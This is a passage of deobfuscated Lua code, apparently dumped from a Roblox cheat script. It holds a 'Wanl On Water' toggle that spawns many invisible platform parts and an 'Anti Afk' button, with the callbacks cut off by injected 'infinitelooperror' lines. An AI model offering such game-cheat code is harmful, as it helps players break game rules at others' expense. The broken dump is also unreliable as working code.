        _call1400.Size = Vector3.new(2048, 1, 2048)
        _call1400.Position = (_call51 + Vector3.new(- 2048, 0, - 43008))
        _call1400.Anchored = true
        _call1400.Transparency = 1
        _call1400.CanCollide = true
        _call1400.Name = "Part_UpLeft_1_21"
        _call1400.Parent = workspace
        local _call1407 = Instance.new("Part")
        _call1407.Size = Vector3.new(2048, 1, 2048)
        _call1407.Position = (_call51 + Vector3.new(2048, 0, - 43008))
        _call1407.Anchored = true
        _call1407.Transparency = 1
        _call1407.CanCollide = true
        _call1407.Name = "Part_UpRight_1_21"
        _call1407.Parent = workspace
        local _call1414 = Instance.new("Part")
        _call1414.Size = Vector3.new(2048, 1, 2048)
        _call1414.Position = (_call51 + Vector3.new(2048, 0, 45056))
        _call1414.Anchored = true
        _call1414.Transparency = 1
        _call1414.CanCollide = true
        _call1414.Name = "Part_Side_1_22"
        _call1414.Parent = workspace
        local _call1421 = Instance.new("Part")
        _call1421.Size = Vector3.new(2048, 1, 2048)
        _call1421.Position = (_call51 + Vector3.new(- 2048, 0, 45056))
        _call1421.Anchored = true
        _call1421.Transparency = 1
        _call1421.CanCollide = true
        _call1421.Name = "Part_LeftRight_1_22"
        _call1421.Parent = workspace
        local _call1428 = Instance.new("Part")
        _call1428.Size = Vector3.new(2048, 1, 2048)
        _call1428.Position = (_call51 + Vector3.new(- 2048, 0, - 45056))
        _call1428.Anchored = true
        _call1428.Transparency = 1
        _call1428.CanCollide = true
        _call1428.Name = "Part_UpLeft_1_22"
        _call1428.Parent = workspace
        local _call1435 = Instance.new("Part")
        _call1435.Size = Vector3.new(2048, 1, 2048)
        _call1435.Position = (_call51 + Vector3.new(2048, 0, - 45056))
        _call1435.Anchored = true
        _call1435.Transparency = 1
        _call1435.CanCollide = true
        _call1435.Name = "Part_UpRight_1_22"
        _call1435.Parent = workspace
        local _call1442 = Instance.new("Part")
        _call1442.Size = Vector3.new(2048, 1, 2048)
        _call1442.Position = (_call51 + Vector3.new(2048, 0, 47104))
        _call1442.Anchored = true
        _call1442.Transparency = 1
        _call1442.CanCollide = true
        _call1442.Name = "Part_Side_1_23"
        _call1442.Parent = workspace
        local _call1449 = Instance.new("Part")
        _call1449.Size = Vector3.new(2048, 1, 2048)
        _call1449.Position = (_call51 + Vector3.new(- 2048, 0, 47104))
        _call1449.Anchored = true
        _call1449.Transparency = 1
        _call1449.CanCollide = true
        _call1449.Name = "Part_LeftRight_1_23"
        _call1449.Parent = workspace
        local _call1456 = Instance.new("Part")
        _call1456.Size = Vector3.new(2048, 1, 2048)
        _call1456.Position = (_call51 + Vector3.new(- 2048, 0, - 47104))
        _call1456.Anchored = true
        _call1456.Transparency = 1
        _call1456.CanCollide = true
        _call1456.Name = "Part_UpLeft_1_23"
        _call1456.Parent = workspace
        local _call1463 = Instance.new("Part")
        _call1463.Size = Vector3.new(2048, 1, 2048)
        _call1463.Position = (_call51 + Vector3.new(2048, 0, - 47104))
        _call1463.Anchored = true
        _call1463.Transparency = 1
        _call1463.CanCollide = true
        _call1463.Name = "Part_UpRight_1_23"
        _call1463.Parent = workspace
        local _call1470 = Instance.new("Part")
        _call1470.Size = Vector3.new(2048, 1, 2048)
        _call1470.Position = (_call51 + Vector3.new(2048, 0, 49152))
        _call1470.Anchored = true
        _call1470.Transparency = 1
        _call1470.CanCollide = true
        _call1470.Name = "Part_Side_1_24"
        _call1470.Parent = workspace
        local _call1477 = Instance.new("Part")
        _call1477.Size = Vector3.new(2048, 1, 2048)
        _call1477.Position = (_call51 + Vector3.new(- 2048, 0, 49152))
        _call1477.Anchored = true
        _call1477.Transparency = 1
        _call1477.CanCollide = true
        _call1477.Name = "Part_LeftRight_1_24"
        _call1477.Parent = workspace
        local _call1484 = Instance.new("Part")
        _call1484.Size = Vector3.new(2048, 1, 2048)
        _call1484.Position = (_call51 + Vector3.new(- 2048, 0, - 49152))
        _call1484.Anchored = true
        _call1484.Transparency = 1
        _call1484.CanCollide = true
        _call1484.Name = "Part_UpLeft_1_24"
        _call1484.Parent = workspace
        local _call1491 = Instance.new("Part")
        _call1491.Size = Vector3.new(2048, 1, 2048)
        _call1491.Position = (_call51 + Vector3.new(2048, 0, - 49152))
        _call1491.Anchored = true
        _call1491.Transparency = 1
        _call1491.CanCollide = true
        _call1491.Name = "Part_UpRight_1_24"
        _call1491.Parent = workspace
        local _call1498 = Instance.new("Part")
        _call1498.Size = Vector3.new(2048, 1, 2048)
        _call1498.Position = (_call51 + Vector3.new(4096, 0, 0))
        _call1498.Anchored = true
        _call1498.Transparency = 1
        _call1498.CanCollide = true
        _call1498.Name = "Part_Side_2_0"
        _call1498.Parent = workspace
        local _call1505 = Instance.new("Part")
        _call1505.Size = Vector3.new(2048, 1, 2048)
        _call1505.Position = (_call51 + Vector3.new(- 4096, 0, 0))
        _call1505.Anchored = true
        _call1505.Transparency = 1
        _call1505.CanCollide = true
        _call1505.Name = "Part_LeftRight_2_0"
        _call1505.Parent = workspace
        local _call1512 = Instance.new("Part")
        _call1512.Size = Vector3.new(2048, 1, 2048)
        _call1512.Position = (_call51 + Vector3.new(- 4096, 0, - 0))
        _call1512.Anchored = true
        _call1512.Transparency = 1
        _call1512.CanCollide = true
        _call1512.Name = "Part_UpLeft_2_0"
        _call1512.Parent = workspace
        local _call1519 = Instance.new("Part")
        _call1519.Size = Vector3.new(2048, 1, 2048)
        _call1519.Position = (_call51 + Vector3.new(4096, 0, - 0))
        _call1519.Anchored = true
        _call1519.Transparency = 1
        _call1519.CanCollide = true
        _call1519.Name = "Part_UpRight_2_0"
        _call1519.Parent = workspace
        local _call1526 = Instance.new("Part")
        _call1526.Size = Vector3.new(2048, 1, 2048)
        _call1526.Position = (_call51 + Vector3.new(4096, 0, 2048))
        _call1526.Anchored = true
        _call1526.Transparency = 1
        _call1526.CanCollide = true
        _call1526.Name = "Part_Side_2_1"
        _call1526.Parent = workspace
        local _call1533 = Instance.new("Part")
        _call1533.Size = Vector3.new(2048, 1, 2048)
        _call1533.Position = (_call51 + Vector3.new(- 4096, 0, 2048))
        _call1533.Anchored = true
        _call1533.Transparency = 1
        _call1533.CanCollide = true
        _call1533.Name = "Part_LeftRight_2_1"
        _call1533.Parent = workspace
        local _call1540 = Instance.new("Part")
        _call1540.Size = Vector3.new(2048, 1, 2048)
        _call1540.Position = (_call51 + Vector3.new(- 4096, 0, - 2048))
        _call1540.Anchored = true
        _call1540.Transparency = 1
        _call1540.CanCollide = true
        _call1540.Name = "Part_UpLeft_2_1"
        _call1540.Parent = workspace
        local _call1547 = Instance.new("Part")
        _call1547.Size = Vector3.new(2048, 1, 2048)
        _call1547.Position = (_call51 + Vector3.new(4096, 0, - 2048))
        _call1547.Anchored = true
        _call1547.Transparency = 1
        _call1547.CanCollide = true
        _call1547.Name = "Part_UpRight_2_1"
        _call1547.Parent = workspace
        local _call1554 = Instance.new("Part")
        _call1554.Size = Vector3.new(2048, 1, 2048)
        _call1554.Position = (_call51 + Vector3.new(4096, 0, 4096))
        _call1554.Anchored = true
        _call1554.Transparency = 1
        _call1554.CanCollide = true
        _call1554.Name = "Part_Side_2_2"
        _call1554.Parent = workspace
        local _call1561 = Instance.new("Part")
        _call1561.Size = Vector3.new(2048, 1, 2048)
        _call1561.Position = (_call51 + Vector3.new(- 4096, 0, 4096))
        _call1561.Anchored = true
        _call1561.Transparency = 1
        _call1561.CanCollide = true
        _call1561.Name = "Part_LeftRight_2_2"
        _call1561.Parent = workspace
        local _call1568 = Instance.new("Part")
        _call1568.Size = Vector3.new(2048, 1, 2048)
        _call1568.Position = (_call51 + Vector3.new(- 4096, 0, - 4096))
        _call1568.Anchored = true
        _call1568.Transparency = 1
        _call1568.CanCollide = true
        _call1568.Name = "Part_UpLeft_2_2"
        _call1568.Parent = workspace
        local _call1575 = Instance.new("Part")
        _call1575.Size = Vector3.new(2048, 1, 2048)
        _call1575.Position = (_call51 + Vector3.new(4096, 0, - 4096))
        _call1575.Anchored = true
        _call1575.Transparency = 1
        _call1575.CanCollide = true
        _call1575.Name = "Part_UpRight_2_2"
        _call1575.Parent = workspace
        local _call1582 = Instance.new("Part")
        _call1582.Size = Vector3.new(2048, 1, 2048)
        _call1582.Position = (_call51 + Vector3.new(4096, 0, 6144))
        _call1582.Anchored = true
        _call1582.Transparency = 1
        _call1582.CanCollide = true
        _call1582.Name = "Part_Side_2_3"
        _call1582.Parent = workspace
        local _call1589 = Instance.new("Part")
        _call1589.Size = Vector3.new(2048, 1, 2048)
        _call1589.Position = (_call51 + Vector3.new(- 4096, 0, 6144))
        _call1589.Anchored = true
        _call1589.Transparency = 1
        _call1589.CanCollide = true
        _call1589.Name = "Part_LeftRight_2_3"
        _call1589.Parent = workspace
        local _call1596 = Instance.new("Part")
        _call1596.Size = Vector3.new(2048, 1, 2048)
        _call1596.Position = (_call51 + Vector3.new(- 4096, 0, - 6144))
        _call1596.Anchored = true
        _call1596.Transparency = 1
        _call1596.CanCollide = true
        _call1596.Name = "Part_UpLeft_2_3"
        _call1596.Parent = workspace
        local _call1603 = Instance.new("Part")
        _call1603.Size = Vector3.new(2048, 1, 2048)
        _call1603.Position = (_call51 + Vector3.new(4096, 0, - 6144))
        _call1603.Anchored = true
        _call1603.Transparency = 1
        _call1603.CanCollide = true
        _call1603.Name = "Part_UpRight_2_3"
        _call1603.Parent = workspace
        local _call1610 = Instance.new("Part")
        _call1610.Size = Vector3.new(2048, 1, 2048)
        _call1610.Position = (_call51 + Vector3.new(4096, 0, 8192))
        _call1610.Anchored = true
        _call1610.Transparency = 1
        _call1610.CanCollide = true
        _call1610.Name = "Part_Side_2_4"
        _call1610.Parent = workspace
        local _call1617 = Instance.new("Part")
        _call1617.Size = Vector3.new(2048, 1, 2048)
        _call1617.Position = (_call51 + Vector3.new(- 4096, 0, 8192))
        _call1617.Anchored = true
        _call1617.Transparency = 1
        _call1617.CanCollide = true
        _call1617.Name = "Part_LeftRight_2_4"
        _call1617.Parent = workspace
        local _call1624 = Instance.new("Part")
        _call1624.Size = Vector3.new(2048, 1, 2048)
        _call1624.Position = (_call51 + Vector3.new(- 4096, 0, - 8192))
        _call1624.Anchored = true
        _call1624.Transparency = 1
        _call1624.CanCollide = true
        _call1624.Name = "Part_UpLeft_2_4"
        _call1624.Parent = workspace
        local _call1631 = Instance.new("Part")
        _call1631.Size = Vector3.new(2048, 1, 2048)
        _call1631.Position = (_call51 + Vector3.new(4096, 0, - 8192))
        _call1631.Anchored = true
        _call1631.Transparency = 1
        _call1631.CanCollide = true
        _call1631.Name = "Part_UpRight_2_4"
        _call1631.Parent = workspace
        local _call1638 = Instance.new("Part")
        _call1638.Size = Vector3.new(2048, 1, 2048)
        _call1638.Position = (_call51 + Vector3.new(4096, 0, 10240))
        _call1638.Anchored = true
        _call1638.Transparency = 1
        _call1638.CanCollide = true
        _call1638.Name = "Part_Side_2_5"
        _call1638.Parent = workspace
        local _call1645 = Instance.new("Part")
        _call1645.Size = Vector3.new(2048, 1, 2048)
        _call1645.Position = (_call51 + Vector3.new(- 4096, 0, 10240))
        _call1645.Anchored = true
        _call1645.Transparency = 1
        _call1645.CanCollide = true
        _call1645.Name = "Part_LeftRight_2_5"
        _call1645.Parent = workspace
        local _call1652 = Instance.new("Part")
        _call1652.Size = Vector3.new(2048, 1, 2048)
        _call1652.Position = (_call51 + Vector3.new(- 4096, 0, - 10240))
        _call1652.Anchored = true
        _call1652.Transparency = 1
        _call1652.CanCollide = true
        _call1652.Name = "Part_UpLeft_2_5"
        _call1652.Parent = workspace
        local _call1659 = Instance.new("Part")
        _call1659.Size = Vector3.new(2048, 1, 2048)
        _call1659.Position = (_call51 + Vector3.new(4096, 0, - 10240))
        _call1659.Anchored = true
        _call1659.Transparency = 1
        _call1659.CanCollide = true
        _call1659.Name = "Part_UpRight_2_5"
        _call1659.Parent = workspace
        local _call1666 = Instance.new("Part")
        _call1666.Size = Vector3.new(2048, 1, 2048)
        _call1666.Position = (_call51 + Vector3.new(4096, 0, 12288))
        _call1666.Anchored = true
        _call1666.Transparency = 1
        _call1666.CanCollide = true
        _call1666.Name = "Part_Side_2_6"
        _call1666.Parent = workspace
        local _call1673 = Instance.new("Part")
        _call1673.Size = Vector3.new(2048, 1, 2048)
        _call1673.Position = (_call51 + Vector3.new(- 4096, 0, 12288))
        _call1673.Anchored = true
        _call1673.Transparency = 1
        _call1673.CanCollide = true
        _call1673.Name = "Part_LeftRight_2_6"
        _call1673.Parent = workspace
        local _call1680 = Instance.new("Part")
        _call1680.Size = Vector3.new(2048, 1, 2048)
        _call1680.Position = (_call51 + Vector3.new(- 4096, 0, - 12288))
        _call1680.Anchored = true
        _call1680.Transparency = 1
        _call1680.CanCollide = true
        _call1680.Name = "Part_UpLeft_2_6"
        _call1680.Parent = workspace
        local _call1687 = Instance.new("Part")
        _call1687.Size = Vector3.new(2048, 1, 2048)
        _call1687.Position = (_call51 + Vector3.new(4096, 0, - 12288))
        _call1687.Anchored = true
        _call1687.Transparency = 1
        _call1687.CanCollide = true
        _call1687.Name = "Part_UpRight_2_6"
        _call1687.Parent = workspace
        local _call1694 = Instance.new("Part")
        _call1694.Size = Vector3.new(2048, 1, 2048)
        _call1694.Position = (_call51 + Vector3.new(4096, 0, 14336))
        _call1694.Anchored = true
        _call1694.Transparency = 1
        _call1694.CanCollide = true
        _call1694.Name = "Part_Side_2_7"
        _call1694.Parent = workspace
        local _call1701 = Instance.new("Part")
        _call1701.Size = Vector3.new(2048, 1, 2048)
        _call1701.Position = (_call51 + Vector3.new(- 4096, 0, 14336))
        _call1701.Anchored = true
        _call1701.Transparency = 1
        _call1701.CanCollide = true
        _call1701.Name = "Part_LeftRight_2_7"
        _call1701.Parent = workspace
        local _call1708 = Instance.new("Part")
        _call1708.Size = Vector3.new(2048, 1, 2048)
        _call1708.Position = (_call51 + Vector3.new(- 4096, 0, - 14336))
        _call1708.Anchored = true
        _call1708.Transparency = 1
        _call1708.CanCollide = true
        _call1708.Name = "Part_UpLeft_2_7"
        _call1708.Parent = workspace
        local _call1715 = Instance.new("Part")
        _call1715.Size = Vector3.new(2048, 1, 2048)
        _call1715.Position = (_call51 + Vector3.new(4096, 0, - 14336))
        _call1715.Anchored = true
        _call1715.Transparency = 1
        _call1715.CanCollide = true
        _call1715.Name = "Part_UpRight_2_7"
        _call1715.Parent = workspace
        local _call1722 = Instance.new("Part")
        _call1722.Size = Vector3.new(2048, 1, 2048)
        _call1722.Position = (_call51 + Vector3.new(4096, 0, 16384))
        _call1722.Anchored = true
        _call1722.Transparency = 1
        _call1722.CanCollide = true
        _call1722.Name = "Part_Side_2_8"
        _call1722.Parent = workspace
        local _call1729 = Instance.new("Part")
        _call1729.Size = Vector3.new(2048, 1, 2048)
        _call1729.Position = (_call51 + Vector3.new(- 4096, 0, 16384))
        _call1729.Anchored = true
        _call1729.Transparency = 1
        _call1729.CanCollide = true
        _call1729.Name = "Part_LeftRight_2_8"
        _call1729.Parent = workspace
        local _call1736 = Instance.new("Part")
        _call1736.Size = Vector3.new(2048, 1, 2048)
        _call1736.Position = (_call51 + Vector3.new(- 4096, 0, - 16384))
        _call1736.Anchored = true
        _call1736.Transparency = 1
        _call1736.CanCollide = true
        _call1736.Name = "Part_UpLeft_2_8"
        _call1736.Parent = workspace
        local _call1743 = Instance.new("Part")
        _call1743.Size = Vector3.new(2048, 1, 2048)
        _call1743.Position = (_call51 + Vector3.new(4096, 0, - 16384))
        _call1743.Anchored = true
        _call1743.Transparency = 1
        _call1743.CanCollide = true
        _call1743.Name = "Part_UpRight_2_8"
        _call1743.Parent = workspace
        local _call1750 = Instance.new("Part")
        _call1750.Size = Vector3.new(2048, 1, 2048)
        _call1750.Position = (_call51 + Vector3.new(4096, 0, 18432))
        _call1750.Anchored = true
        _call1750.Transparency = 1
        _call1750.CanCollide = true
        _call1750.Name = "Part_Side_2_9"
        _call1750.Parent = workspace
        local _call1757 = Instance.new("Part")
        _call1757.Size = Vector3.new(2048, 1, 2048)
        _call1757.Position = (_call51 + Vector3.new(- 4096, 0, 18432))
        _call1757.Anchored = true
        _call1757.Transparency = 1
        _call1757.CanCollide = true
        _call1757.Name = "Part_LeftRight_2_9"
        _call1757.Parent = workspace
        local _call1764 = Instance.new("Part")
        _call1764.Size = Vector3.new(2048, 1, 2048)
        _call1764.Position = (_call51 + Vector3.new(- 4096, 0, - 18432))
        _call1764.Anchored = true
        _call1764.Transparency = 1
        _call1764.CanCollide = true
        _call1764.Name = "Part_UpLeft_2_9"
        _call1764.Parent = workspace
        local _call1771 = Instance.new("Part")
        _call1771.Size = Vector3.new(2048, 1, 2048)
        _call1771.Position = (_call51 + Vector3.new(4096, 0, - 18432))
        _call1771.Anchored = true
        _call1771.Transparency = 1
        _call1771.CanCollide = true
        _call1771.Name = "Part_UpRight_2_9"
        _call1771.Parent = workspace
        local _call1778 = Instance.new("Part")
        _call1778.Size = Vector3.new(2048, 1, 2048)
        _call1778.Position = (_call51 + Vector3.new(4096, 0, 20480))
        _call1778.Anchored = true
        _call1778.Transparency = 1
        _call1778.CanCollide = true
        _call1778.Name = "Part_Side_2_10"
        _call1778.Parent = workspace
        local _call1785 = Instance.new("Part")
        _call1785.Size = Vector3.new(2048, 1, 2048)
        _call1785.Position = (_call51 + Vector3.new(- 4096, 0, 20480))
        _call1785.Anchored = true
        _call1785.Transparency = 1
        _call1785.CanCollide = true
        _call1785.Name = "Part_LeftRight_2_10"
        _call1785.Parent = workspace
        local _call1792 = Instance.new("Part")
        _call1792.Size = Vector3.new(2048, 1, 2048)
        _call1792.Position = (_call51 + Vector3.new(- 4096, 0, - 20480))
        _call1792.Anchored = true
        _call1792.Transparency = 1
        _call1792.CanCollide = true
        _call1792.Name = "Part_UpLeft_2_10"
        _call1792.Parent = workspace
        local _call1799 = Instance.new("Part")
        _call1799.Size = Vector3.new(2048, 1, 2048)
        _call1799.Position = (_call51 + Vector3.new(4096, 0, - 20480))
        _call1799.Anchored = true
        _call1799.Transparency = 1
        _call1799.CanCollide = true
        _call1799.Name = "Part_UpRight_2_10"
        _call1799.Parent = workspace
        local _call1806 = Instance.new("Part")
        _call1806.Size = Vector3.new(2048, 1, 2048)
        _call1806.Position = (_call51 + Vector3.new(4096, 0, 22528))
        _call1806.Anchored = true
        _call1806.Transparency = 1
        _call1806.CanCollide = true
        _call1806.Name = "Part_Side_2_11"
        _call1806.Parent = workspace
        local _call1813 = Instance.new("Part")
        _call1813.Size = Vector3.new(2048, 1, 2048)
        _call1813.Position = (_call51 + Vector3.new(- 4096, 0, 22528))
        _call1813.Anchored = true
        _call1813.Transparency = 1
        _call1813.CanCollide = true
        _call1813.Name = "Part_LeftRight_2_11"
        _call1813.Parent = workspace
        local _call1820 = Instance.new("Part")
        _call1820.Size = Vector3.new(2048, 1, 2048)
        _call1820.Position = (_call51 + Vector3.new(- 4096, 0, - 22528))
        _call1820.Anchored = true
        _call1820.Transparency = 1
        _call1820.CanCollide = true
        _call1820.Name = "Part_UpLeft_2_11"
        _call1820.Parent = workspace
        local _call1827 = Instance.new("Part")
        _call1827.Size = Vector3.new(2048, 1, 2048)
        _call1827.Position = (_call51 + Vector3.new(4096, 0, - 22528))
        _call1827.Anchored = true
        _call1827.Transparency = 1
        _call1827.CanCollide = true
        _call1827.Name = "Part_UpRight_2_11"
        _call1827.Parent = workspace
        local _call1834 = Instance.new("Part")
        _call1834.Size = Vector3.new(2048, 1, 2048)
        _call1834.Position = (_call51 + Vector3.new(4096, 0, 24576))
        _call1834.Anchored = true
        _call1834.Transparency = 1
        _call1834.CanCollide = true
        _call1834.Name = "Part_Side_2_12"
        _call1834.Parent = workspace
        local _call1841 = Instance.new("Part")
        _call1841.Size = Vector3.new(2048, 1, 2048)
        _call1841.Position = (_call51 + Vector3.new(- 4096, 0, 24576))
        _call1841.Anchored = true
        _call1841.Transparency = 1
        _call1841.CanCollide = true
        _call1841.Name = "Part_LeftRight_2_12"
        _call1841.Parent = workspace
        local _call1848 = Instance.new("Part")
        _call1848.Size = Vector3.new(2048, 1, 2048)
        _call1848.Position = (_call51 + Vector3.new(- 4096, 0, - 24576))
        _call1848.Anchored = true
        _call1848.Transparency = 1
        _call1848.CanCollide = true
        _call1848.Name = "Part_UpLeft_2_12"
        _call1848.Parent = workspace
        local _call1855 = Instance.new("Part")
        _call1855.Size = Vector3.new(2048, 1, 2048)
        _call1855.Position = (_call51 + Vector3.new(4096, 0, - 24576))
        _call1855.Anchored = true
        _call1855.Transparency = 1
        _call1855.CanCollide = true
        _call1855.Name = "Part_UpRight_2_12"
        _call1855.Parent = workspace
        local _call1862 = Instance.new("Part")
        _call1862.Size = Vector3.new(2048, 1, 2048)
        _call1862.Position = (_call51 + Vector3.new(4096, 0, 26624))
        _call1862.Anchored = true
        _call1862.Transparency = 1
        _call1862.CanCollide = true
        _call1862.Name = "Part_Side_2_13"
        _call1862.Parent = workspace
        local _call1869 = Instance.new("Part")
        _call1869.Size = Vector3.new(2048, 1, 2048)
        _call1869.Position = (_call51 + Vector3.new(- 4096, 0, 26624))
        _call1869.Anchored = true
        _call1869.Transparency = 1
        _call1869.CanCollide = true
        _call1869.Name = "Part_LeftRight_2_13"
        _call1869.Parent = workspace
        local _call1876 = Instance.new("Part")
        _call1876.Size = Vector3.new(2048, 1, 2048)
        _call1876.Position = (_call51 + Vector3.new(- 4096, 0, - 26624))
        _call1876.Anchored = true
        _call1876.Transparency = 1
        _call1876.CanCollide = true
        _call1876.Name = "Part_UpLeft_2_13"
        _call1876.Parent = workspace
        local _call1883 = Instance.new("Part")
        _call1883.Size = Vector3.new(2048, 1, 2048)
        _call1883.Position = (_call51 + Vector3.new(4096, 0, - 26624))
        _call1883.Anchored = true
        _call1883.Transparency = 1
        _call1883.CanCollide = true
        _call1883.Name = "Part_UpRight_2_13"
        _call1883.Parent = workspace
        local _call1890 = Instance.new("Part")
        _call1890.Size = Vector3.new(2048, 1, 2048)
        _call1890.Position = (_call51 + Vector3.new(4096, 0, 28672))
        _call1890.Anchored = true
        _call1890.Transparency = 1
        _call1890.CanCollide = true
        _call1890.Name = "Part_Side_2_14"
        _call1890.Parent = workspace
        local _call1897 = Instance.new("Part")
        _call1897.Size = Vector3.new(2048, 1, 2048)
        _call1897.Position = (_call51 + Vector3.new(- 4096, 0, 28672))
        _call1897.Anchored = true
        _call1897.Transparency = 1
        _call1897.CanCollide = true
        _call1897.Name = "Part_LeftRight_2_14"
        _call1897.Parent = workspace
        local _call1904 = Instance.new("Part")
        _call1904.Size = Vector3.new(2048, 1, 2048)
        _call1904.Position = (_call51 + Vector3.new(- 4096, 0, - 28672))
        _call1904.Anchored = true
        _call1904.Transparency = 1
        _call1904.CanCollide = true
        _call1904.Name = "Part_UpLeft_2_14"
        _call1904.Parent = workspace
        local _call1911 = Instance.new("Part")
        _call1911.Size = Vector3.new(2048, 1, 2048)
        _call1911.Position = (_call51 + Vector3.new(4096, 0, - 28672))
        _call1911.Anchored = true
        _call1911.Transparency = 1
        _call1911.CanCollide = true
        _call1911.Name = "Part_UpRight_2_14"
        _call1911.Parent = workspace
        local _call1918 = Instance.new("Part")
        _call1918.Size = Vector3.new(2048, 1, 2048)
        _call1918.Position = (_call51 + Vector3.new(4096, 0, 30720))
        _call1918.Anchored = true
        _call1918.Transparency = 1
        _call1918.CanCollide = true
        _call1918.Name = "Part_Side_2_15"
        _call1918.Parent = workspace
        local _call1925 = Instance.new("Part")
        _call1925.Size = Vector3.new(2048, 1, 2048)
        _call1925.Position = (_call51 + Vector3.new(- 4096, 0, 30720))
        _call1925.Anchored = true
        _call1925.Transparency = 1
        _call1925.CanCollide = true
        _call1925.Name = "Part_LeftRight_2_15"
        _call1925.Parent = workspace
        local _call1932 = Instance.new("Part")
        _call1932.Size = Vector3.new(2048, 1, 2048)
        _call1932.Position = (_call51 + Vector3.new(- 4096, 0, - 30720))
        _call1932.Anchored = true
        _call1932.Transparency = 1
        _call1932.CanCollide = true
        _call1932.Name = "Part_UpLeft_2_15"
        _call1932.Parent = workspace
        Instance.new("Part")
        error(nil, "internal 346: <25ms: infinitelooperror>")
    end,
    Name = "Wanl On Water",
    Flag = "Toggle1",
})
_call53:CreateButton({
    Name = "Anti Afk",
    Callback = function(_1943, _1943_2, _1943_3)
        Instance.new("ScreenGui")
        Instance.new("Frame")
        Instance.new("Frame")
        Instance.new("TextLabel")
        Instance.new("TextButton")
        Instance.new("TextButton")
        Instance.new("Frame")
        Instance.new("TextLabel")
        Instance.new("Frame")
        error(nil, "internal 346: <25ms: infinitelooperror>")
    end,
})
error(nil, "internal 346: <25ms: infinitelooperror>")
